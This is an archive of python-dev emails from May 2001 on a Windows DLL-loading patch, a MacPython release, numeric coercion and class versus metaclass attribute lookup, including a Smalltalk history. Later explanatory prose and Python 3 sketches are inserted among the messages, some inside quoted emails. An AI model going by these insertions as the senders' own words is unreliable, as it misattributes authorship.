From MarkH@ActiveState.com  Tue May  1 01:42:19 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;
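
The difference between the removed code and the new GetFullPathName() approach is easiest to see side by side. Below is a minimal sketch that emulates both strategies in Python with the standard ntpath module, so it runs on any OS. The names old_style_path and new_style_path are hypothetical. ntpath.normpath(ntpath.join(...)) only approximates GetFullPathName(), and per-drive current directories are not modelled. Also note that, as posted, the patch writes the absolute path into pathbuf but still passes pathname to LoadLibraryEx.

```python
import ntpath  # Windows path rules; importable on any OS


def old_style_path(pathname: str, cwd: str) -> str:
    """Emulate the removed code: only a bare filename is rewritten."""
    if "\\" in pathname or "/" in pathname:
        return pathname  # has a directory part, so it is left alone
    # Keep the drive letter of the current directory (e.g. "C:") and
    # append ".\" plus the name, truncated to 255 chars like "%-.255s".
    drive = cwd[:2] if len(cwd) >= 2 and cwd[1] == ":" else ""
    return drive + ".\\" + pathname[:255]


def new_style_path(pathname: str, cwd: str) -> str:
    """Approximate GetFullPathName(): resolve against cwd and normalize.

    Simplification: per-drive current directories ("D:spam.pyd") and
    other Win32 path subtleties are not modelled.
    """
    return ntpath.normpath(ntpath.join(cwd, pathname))
```

For example, with cwd "C:\Python21", old_style_path("spam.pyd", cwd) yields the drive-relative "C:.\spam.pyd", while new_style_path("spam.pyd", cwd) yields "C:\Python21\spam.pyd".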


From thomas@xs4all.net  Tue May  1 09:07:48 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keeping your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine-tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Tue May  1 11:30:57 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything other than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Tue May  1 22:22:11 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
problem with the comparison code in Python 2.1. Looking at
the code it seems that one of my original coercion patches
did not make it into the core. I added a new API, PyNumber_Compare(),
which knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack@oratrix.nl  Tue May  1 22:23:59 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as for writing large
applications. MacPython offers a lot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
Unix-compatible CGI scripting, image-manipulation libraries, numerical
libraries, Tk-based machine-independent windowing and lots more. It
is also unique among Python ports in letting you create fully
self-contained (and, hence, distributable) applications without
needing a C compiler or anything else.

New in this version:
- A choice of Carbon or Classic runtime, so it runs on anything from
  MacOS 8.1 to MacOS X
- Distutils support for easy installation of extension packages
- BBEdit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal or active installer

Please send feedback on this release to pythonmac-sig@python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido@digicool.com  Wed May  2 01:52:29 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.
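For comparison, here is the same example in present-day Python 3, not the 2001 descr-branch. There, the MyDictType code works as hoped: dict.__repr__ finds the instance method stored in dict.__dict__, the metatype's version is still reachable explicitly as type.__repr__(dict), and dict.__class__ still returns type because the metatype's __class__ attribute is a data descriptor, which takes priority.

```python
# Present-day Python 3, shown only for comparison with the 2001 proposal.
class MyDictType(dict):
    def __repr__(self):
        # dict.__repr__ resolves to the instance method stored in
        # dict.__dict__, not to type.__repr__ (which reprs the class).
        return "MyDictType(%s)" % dict.__repr__(self)


d = MyDictType(a=1)
print(repr(d))              # MyDictType({'a': 1})
print(type.__repr__(dict))  # <class 'dict'>
print(dict.__class__)       # <class 'type'>
```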

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalk's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.

Sigh.
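The proposed rule for resolving DictType.foo can be modelled with plain dictionaries. This is a minimal sketch under stated assumptions: lookup_type_attr, DICT_TYPE_DICT and TYPE_TYPE_DICT are hypothetical stand-ins for DictType.__dict__ and TypeType.__dict__, and callable() is assumed to be a good enough test for "describes a method".

```python
def lookup_type_attr(type_dict, metatype_dict, name):
    """Model of the proposed rule for resolving T.name.

    type_dict     -- stands in for T.__dict__ (descriptors for instances)
    metatype_dict -- stands in for type(T).__dict__ (attributes of T itself)
    """
    in_type, in_meta = name in type_dict, name in metatype_dict
    if in_type and in_meta:
        # Clash: a method in T.__dict__ wins; anything else (such as the
        # __class__ descriptor) defers to the metatype.
        # Assumption: callable() stands in for "describes a method".
        if callable(type_dict[name]):
            return type_dict[name]
        return metatype_dict[name]
    if in_type:
        return type_dict[name]
    if in_meta:
        return metatype_dict[name]
    raise AttributeError(name)


# Toy stand-ins for DictType.__dict__ and TypeType.__dict__.
def dict_repr(self):
    return "{...}"


def type_repr(self):
    return "<type 'dictionary'>"


DICT_TYPE_DICT = {"__repr__": dict_repr, "__class__": "<__class__ descriptor>"}
TYPE_TYPE_DICT = {"__repr__": type_repr, "__class__": "TypeType"}
```

With these tables, __repr__ resolves to dict_repr (the method wins), while __class__ resolves to "TypeType" (the non-method descriptor loses).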

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same as Python does.

To illustrate, suppose you have object.method() (using Python-style
syntax).

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)

I believe Python works roughly as follows (just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into
object.__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__, namely
object.__class__.__class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it is exactly the same lookup mechanism.  So there is no
ambiguity.
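The claim that class methods need no special lookup rule can be checked with a small model. This is a hypothetical Python emulation, not Smalltalk's actual implementation: SObject, SClass, send and the DateMetaClass wiring are illustrative names. The same send() serves both d.followingDate() and Date.currentDate().

```python
class SObject:
    """Any Smalltalk object: all lookup needs is a pointer to its class."""

    def __init__(self, cls):
        self.cls = cls


class SClass(SObject):
    """A class is an ordinary object that also holds a method dictionary
    and a single superclass pointer."""

    def __init__(self, name, cls=None, superclass=None):
        super().__init__(cls)
        self.name = name
        self.superclass = superclass
        self.method_dict = {}


def send(receiver, selector, *args):
    """The one lookup rule: start at the receiver's class, search its
    method_dict, follow superclass links, run the method on receiver."""
    cls = receiver.cls
    while cls is not None:
        method = cls.method_dict.get(selector)
        if method is not None:
            return method(receiver, *args)
        cls = cls.superclass
    raise AttributeError("doesNotUnderstand: " + selector)


# Hypothetical wiring: the class object Date is an instance of DateMetaClass.
DateMetaClass = SClass("DateMetaClass")
Date = SClass("Date", cls=DateMetaClass)
Date.method_dict["followingDate"] = lambda self: "instance method on a Date"
DateMetaClass.method_dict["currentDate"] = lambda cls: "class method on " + cls.name

d = SObject(Date)
```

Here send(Date, "followingDate") fails just as send(d, "currentDate") does, because each receiver only ever sees the methods of its own class.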

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
the variable d, I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method

I think this is a nice, conceptually simple model.   Things get
interesting, though, when you start to consider how the mechanism of
class.__class__ -- which is the thing that makes class methods no different
than instance methods -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on an object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object)."  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actual hierarchy has a little
more factoring and I changed the names for more clarity).

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instance is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hierarchy (superclass --
subclass)

plain-class                                   metaclass
----------------                              ----------------
<none>                                        o Class
   o Object                     isInstanceOf     o ObjectMetaClass                     isInstanceOf  MetaClass
      o Class                   isInstanceOf        o ClassMetaClass                   isInstanceOf  MetaClass
         o MetaClass            isInstanceOf           o MetaClassMetaClass            isInstanceOf  MetaClass
      . . .                                         . . .
      o Rectangle               isInstanceOf        o RectangleMetaClass               isInstanceOf  MetaClass
         o SpecializedRectangle isInstanceOf           o SpecializedRectangleMetaClass isInstanceOf  MetaClass

All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().
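Python's own metaclasses offer a loose analogy to RectangleMetaClass. This is a sketch in present-day Python 3, not a description of Smalltalk-80: RectangleMeta and the rectangle fields are hypothetical. It keeps the newFromPointToPoint name from the example above. One difference is that Python creates no per-class metaclass automatically (a subclass of Rectangle simply shares RectangleMeta), and type is an instance of itself, much like the single Class of Smalltalk-76.

```python
class RectangleMeta(type):
    """Plays the role of RectangleMetaClass: its methods are invoked on the
    class object Rectangle, never on Rectangle's instances."""

    def newFromPointToPoint(cls, p1, p2):
        (x1, y1), (x2, y2) = p1, p2
        return cls(min(x1, x2), min(y1, y2), abs(x2 - x1), abs(y2 - y1))


class Rectangle(metaclass=RectangleMeta):
    def __init__(self, x, y, width, height):
        self.x, self.y, self.width, self.height = x, y, width, height

    def area(self):
        return self.width * self.height
```

For instance, Rectangle.newFromPointToPoint((4, 1), (1, 3)) builds a 3-by-2 rectangle at (1, 1), but that rectangle has no newFromPointToPoint attribute, because instance lookup never consults the metaclass.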

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido@digicool.com  Wed May  2 02:29:28 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
 <3AEF2903.79308F55@lemburg.com>
References: <3AEF2903.79308F55@lemburg.com>
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> problem with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API, PyNumber_Compare(),
> which knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Wed May  2 01:42:15 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> problem with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API, PyNumber_Compare(),
> which knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido@digicool.com  Wed May  2 02:55:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
 <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com>
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to explicitly raise a more meaningful exception here
> if __all__ doesn't contain strings?

Definitely.  Be my guest.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed May  2 02:22:47 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc. up the inheritance chain.

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.
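A minimal sketch of what the proposed getmethod() might do, written against present-day Python 3 classes. Assumptions: getmethod is the hypothetical builtin from the proposal, it walks the class namespaces along cls.__mro__ (standing in for __classdict__), it handles plain functions only, and MyBaseClass and Derived are illustrative. Present-day Python spells the common case as super().foo(arg), shown for comparison.

```python
def getmethod(cls, name):
    """Hypothetical builtin: find name in the class namespaces along
    cls's MRO, never in an instance __dict__."""
    for klass in cls.__mro__:
        if name in vars(klass):
            return vars(klass)[name]
    raise AttributeError("%s has no method %r" % (cls.__name__, name))


class MyBaseClass:
    def foo(self, arg):
        return "base foo(%s)" % arg


class Derived(MyBaseClass):
    def foo(self, arg):
        # Equivalent of the proposed:  inherited MyBaseClass.foo(arg)
        return "derived+" + getmethod(MyBaseClass, "foo")(self, arg)


class ViaSuper(MyBaseClass):
    def foo(self, arg):
        # Today's spelling of the same idea.
        return "derived+" + super().foo(arg)
```

Because getmethod() ignores instance attributes, an instance attribute named foo cannot shadow the method it returns.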

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Wed May  2 03:48:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
 <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.
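Both idioms mentioned here, class-level counters and class variables used as defaults for instance variables, fit in one minimal sketch. C, initcount and delcount come from the text; color is a hypothetical default added for illustration.

```python
class C:
    initcount = 0   # class variables: shared by every instance
    delcount = 0
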